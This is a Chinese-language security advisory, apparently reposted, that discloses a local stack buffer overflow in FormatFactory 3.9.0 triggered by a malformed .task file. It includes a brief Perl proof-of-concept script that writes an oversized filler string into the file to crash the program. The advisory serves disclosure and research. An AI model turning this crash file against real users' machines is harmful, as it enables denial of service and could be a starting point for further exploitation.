FormatFactory本地栈溢出漏洞

FormatFactory本地栈溢出漏洞


发布日期:2016-09-01
更新日期:2016-09-05

受影响系统:

FormatFactory FormatFactory 3.9.0

描述:

FormatFactory是音频、视频、图形文件类型转换软件。

FormatFactory 3.9.0版本存在本地栈缓冲区溢出漏洞。加载文件(.task)中的错误验证检查导致栈溢出,可使受影响程序崩溃。

<*来源:ZwX
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

ZwX ()提供了如下测试方法:

Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 5000;
open(MYFILE,'>>FormatFactory.task');
print MYFILE $Buff;
close(MYFILE);
print "PoC by ZwX";

建议:

厂商补丁:

FormatFactory
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/f980a23c0e9403f1757aa08cc123fa49.html